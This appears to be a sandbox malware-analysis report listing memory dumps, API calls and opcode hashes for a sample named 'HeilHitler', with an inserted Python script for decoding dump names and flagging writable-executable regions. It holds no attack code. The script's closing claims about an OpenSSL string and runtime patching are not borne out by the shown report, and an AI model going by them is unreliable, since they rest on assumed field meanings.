                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                                                                                                            • Opcode ID: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                            • Instruction ID: 528c13ac300fcc56f4705cb4b58e9af3934c80681faf2d2725b38b10881988d5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7d52f85de62641260209e8dbb28c5e1251e01e8bf24b4306ce9dcd9badf2c9c6
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BB112322B08A8181DA208F65B801169A361FB81FF0F540331EE7DABBE8CF3CE0148700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A95E
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF633D82D22,?,?,?,00007FF633D82D5F,?,?,00000000,00007FF633D83225,?,?,?,00007FF633D83157), ref: 00007FF633D7A968
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                                            • Opcode ID: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                            • Instruction ID: 961b76213ca98761911f8107df0f137bddfc197f78ccfadd275760d864e1703e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46e6024f15a2f57ad5ff64688e0fe3cec5898f8577aba2f63b046adc8766ef53
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ECE08C50F1920282FF096FF2A8571381261AF88B00F840330D81DEA3A2EE2CA892A310
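The dump identifiers in the Memory Dump Source lists above encode where each dumped region lives and how it was mapped. The script below is an added example, not part of the Joe Sandbox report or its tooling: it splits the .sdmp names into fields, groups them per module, and flags regions that are both writable and executable. The field layout (process index, dump index, unique id, base address, page protection, state, memory type, module index) is an assumption made for this example from the values seen in the report; the fifth field matches the Win32 PAGE_* constants and the seventh matches MEM_IMAGE, which is what the decoding relies on. The sample names are the ones listed in the report.

```python
"""Decode Joe Sandbox .sdmp dump names and flag writable+executable image regions.

Field meaning is an ASSUMPTION for this example (the report does not document it);
the PAGE_* and MEM_* values are the standard Win32 constants from winnt.h.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

# Assumed layout: proc.dump.uid.base.protection.state.type.module.sdmp
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<dump>[0-9A-Fa-f]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<state>[0-9A-Fa-f]{8})\."
    r"(?P<mtype>[0-9A-Fa-f]{8})\.(?P<module>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    dump_index: int
    base: int
    protection: int
    mem_type: int
    module_index: int

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection & 0xFF, f"0x{self.protection:X}")

    @property
    def executable(self) -> bool:
        return bool(self.protection & 0xF0)      # any PAGE_EXECUTE* flag

    @property
    def writable(self) -> bool:
        # READWRITE, WRITECOPY, EXECUTE_READWRITE, EXECUTE_WRITECOPY
        # (copy-on-write pages become private RW the moment they are touched)
        return bool(self.protection & 0xCC)


def parse_sdmp(name: str) -> DumpRegion:
    """Split one .sdmp file name into its (assumed) fields."""
    m = SDMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox .sdmp name: {name!r}")
    return DumpRegion(
        process_index=int(m["proc"], 16), dump_index=int(m["dump"], 16),
        base=int(m["base"], 16), protection=int(m["prot"], 16),
        mem_type=int(m["mtype"], 16), module_index=int(m["module"], 16),
    )


def summarize_modules(names):
    """Group regions by (process, module) -> (lowest base, regions sorted by base)."""
    groups = defaultdict(list)
    for n in names:
        r = parse_sdmp(n)
        groups[(r.process_index, r.module_index)].append(r)
    return {k: (min(r.base for r in v), sorted(v, key=lambda r: r.base))
            for k, v in groups.items()}


def rwx_regions(names):
    """Regions that are writable and executable: code that can rewrite itself at
    runtime. Inside a PE image this is worth checking against the on-disk section
    flags to tell a sloppy linker setting from unpacking or runtime patching."""
    return [r for r in map(parse_sdmp, names) if r.executable and r.writable]


SAMPLE_DUMPS = [  # names taken from the report's Memory Dump Source lists
    "00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmp",
    "00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp",
    "00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmp",
    "00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp",
    "00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmp",
    "00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmp",
    "00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmp",
    "00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmp",
    "00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmp",
    "00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp",
    "00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp",
    "00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp",
    "00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp",
    "00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp",
    "00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for (proc, mod), (base, regions) in summarize_modules(SAMPLE_DUMPS).items():
        print(f"process {proc} module {mod:#x} base {base:#018x}")
        for r in regions:
            print(f"  {r.base:#018x} {r.protection_name:<24} {MEM_TYPE.get(r.mem_type, '?')}")
    print("RWX regions:", [f"{r.base:#x}" for r in rwx_regions(SAMPLE_DUMPS)])
```

Run against the two modules listed in this section, the main image (module 0x03, base 0x7FF633D60000) shows the expected read-only header, execute-read code and read-write data layout, while module 0x10 (base 0x7FFDFAE80000, the one carrying the OpenSSL `rec_layer_s3.c` string) has every code region mapped PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY. Whether that comes from the section characteristics of the bundled DLL or from something patching it at runtime is a question to settle on the downloaded dump, not on the names alone.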
APIs
• CloseHandle.KERNEL32(?,?,?,00007FF633D7A9D5,?,?,00000000,00007FF633D7AA8A), ref: 00007FF633D7ABC6
• GetLastError.KERNEL32(?,?,?,00007FF633D7A9D5,?,?,00000000,00007FF633D7AA8A), ref: 00007FF633D7ABD0
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
• Instruction ID: bb6fadb88fe661f1c50253329f5dc08f00c8fd4f1c04d8527db8b862d570277d
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ae1e15d82824e1a5fac1c7302ca2ff5641fe0b0e43db7728cd9339717749910c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E21E721F2C68241FEA59FE5949737D12829F847A1F084339EA2EE77D2CE6DE4416300
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                            • Instruction ID: 2dc2c58e76882c7fe97a43a83f5e256a02c0927397f6123dc5a542c555bc85c4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5a303e376ae32d58fd1e52f1ac99a64fdc1cf63549abbe0bdd4da132c2ec767e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BD41D63291824587EA349FA9A542279B7A0EB55B94F100331E78ED37D1CF3EE443EB51
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                                                                            • Opcode ID: ff43006544f348e3048398159edfdbb45dc07a4a4d076fe4cc9f01bb488bd133
                                                                                                                                                                                                                                            • Instruction ID: 6cee30973ad876b65ab392637d2c869e6a24a0d4b464129539b6c8d1c415d3a5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff43006544f348e3048398159edfdbb45dc07a4a4d076fe4cc9f01bb488bd133
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA31E432B0824186EB6AAF15956097A33A0EB40F58F055471DE2E477CDDF3EE891C700
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                                                                                                            • Opcode ID: e1315d2f6f00395e8c4775e010b327fe7281e2fae45ce4cd0a11699a80637139
                                                                                                                                                                                                                                            • Instruction ID: c482a39cc030fcbdb5c74d12cf6a9067f0b0d24bee4a908b9c7825a79cfd48ab
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1315d2f6f00395e8c4775e010b327fe7281e2fae45ce4cd0a11699a80637139
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A21F721B18B5246FF109FA268063BAA651BF45BC4FCC5930EE1DA7786CE7DE051D300
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                            • Opcode ID: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                            • Instruction ID: af70bb7a3c6f31b9e390633d1bb89b6c7acd811030c50bd4684439e7c952e65f
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2d01373d3233558d420055387ebca2c39d1ce99b2c1a08127fa32cb0ba5fec2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F131C962E1865285F7116FD5884337D2AA0BF80BA4F410335E96DE33D2DFBCE481A711
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3215553584-0
• Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction ID: 71194e22d05641b10dc65178b92433d9c01259dbd81bc5257bd447ae03344ba5
• Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
• Instruction Fuzzy Hash: AA118731A2C64281FA619F91940217DE265BF85B84F844635FB8CF7BD6CF3DD441A701

APIs
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
• Instruction ID: 681b49116d6078b83f6c01a51bb582aea50fed0a75d1bbc720fa48e5edc4b4eb
• Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
• Instruction Fuzzy Hash: 8121C232A08A4586DB618FA8D44237976A1FB84B64F185334E75DDB7D9DF3CE4019B00

APIs
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction ID: 8100abf10ddfc778ae3f560dacaff004b234dc34a937c99278895e9b877d69de
• Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
• Instruction Fuzzy Hash: 26019621A0874581EA04DFA6A902179A6A5FF85FE4F484731EE6CB7BD6CF3CE401A300

APIs
  • Part of subcall function 00007FF633D69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF633D645F4,00000000,00007FF633D61985), ref: 00007FF633D693C9
• LoadLibraryExW.KERNEL32(?,00007FF633D66476,?,00007FF633D6336E), ref: 00007FF633D68EA2
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: ByteCharLibraryLoadMultiWide
• String ID:
• API String ID: 2592636585-0
• Opcode ID: 11a4aaaef8a7a10f6e0ce37232ac144c9e9b59754371ad75d1a790c2d21c933d
• Instruction ID: 578265085706a170f51f15b917ea63c02d5dd7c80fac34327bcf48aebca9e358
• Opcode Fuzzy Hash: 11a4aaaef8a7a10f6e0ce37232ac144c9e9b59754371ad75d1a790c2d21c933d
• Instruction Fuzzy Hash: D9D0C201F3824542EA44A7B7BA47639A251AFC9BC0F98D035EE5D47B5AEC3CD0914B00

APIs
Memory Dump Source
• Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
• Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: c6d810e0a92dfab2f57800588eaa3bba5a0c0cbf05fe10e2817728c59d1b6220
• Instruction ID: f809ee69fdaeef3cf295af42917520fde26c64398c0cb3356ed228048a87a669
• Opcode Fuzzy Hash: c6d810e0a92dfab2f57800588eaa3bba5a0c0cbf05fe10e2817728c59d1b6220
• Instruction Fuzzy Hash: C031AF32B0820286EB6AAF16956097A73A1EB40F54F1694B1DD6E577CDCF3EE881D700

APIs
Memory Dump Source
• Source File: 00000001.00000002.2034183596.00007FFDFAE81000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFAE80000, based on PE: true
• Associated: 00000001.00000002.2034141796.00007FFDFAE80000.00000002.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF3000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF19000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF24000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034183596.00007FFDFAF2E000.00000040.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034512265.00007FFDFAF31000.00000080.00000001.01000000.00000010.sdmp
• Associated: 00000001.00000002.2034545589.00007FFDFAF33000.00000004.00000001.01000000.00000010.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ffdfae80000_HeilHitler.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 8e011317cca6565eb200d0702bfa620ad3ccf4c4be6080c5c317d346bd03422b
• Instruction ID: 76269b6929a057e415c7e40db9153c0251acd282ee2f1ee44e2ff160dd646908
• Opcode Fuzzy Hash: 8e011317cca6565eb200d0702bfa620ad3ccf4c4be6080c5c317d346bd03422b
• Instruction Fuzzy Hash: 16217C32708B8086D758DB26E5906ADB7A0FB88BD4F148135EFAD47B98CF78D595CB00

APIs
• HeapAlloc.KERNEL32(?,?,00000000,00007FF633D7B32A,?,?,?,00007FF633D74F11,?,?,?,?,00007FF633D7A48A), ref: 00007FF633D7EBED
Memory Dump Source
• Source File: 00000001.00000002.2033505327.00007FF633D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF633D60000, based on PE: true
• Associated: 00000001.00000002.2033471768.00007FF633D60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033554529.00007FF633D8B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633D9E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033600199.00007FF633DA1000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000001.00000002.2033670545.00007FF633DA4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_7ff633d60000_HeilHitler.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
                                                                                                                                                                                                                                            • Instruction ID: 7422d4e8f3036dac261518129888d41113bb2b43793f05dbd5aaa9a8b1a7c904
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0190c006dd090f1dc8136ef035d08a675b61e1fdbed98732a32380f018d60316
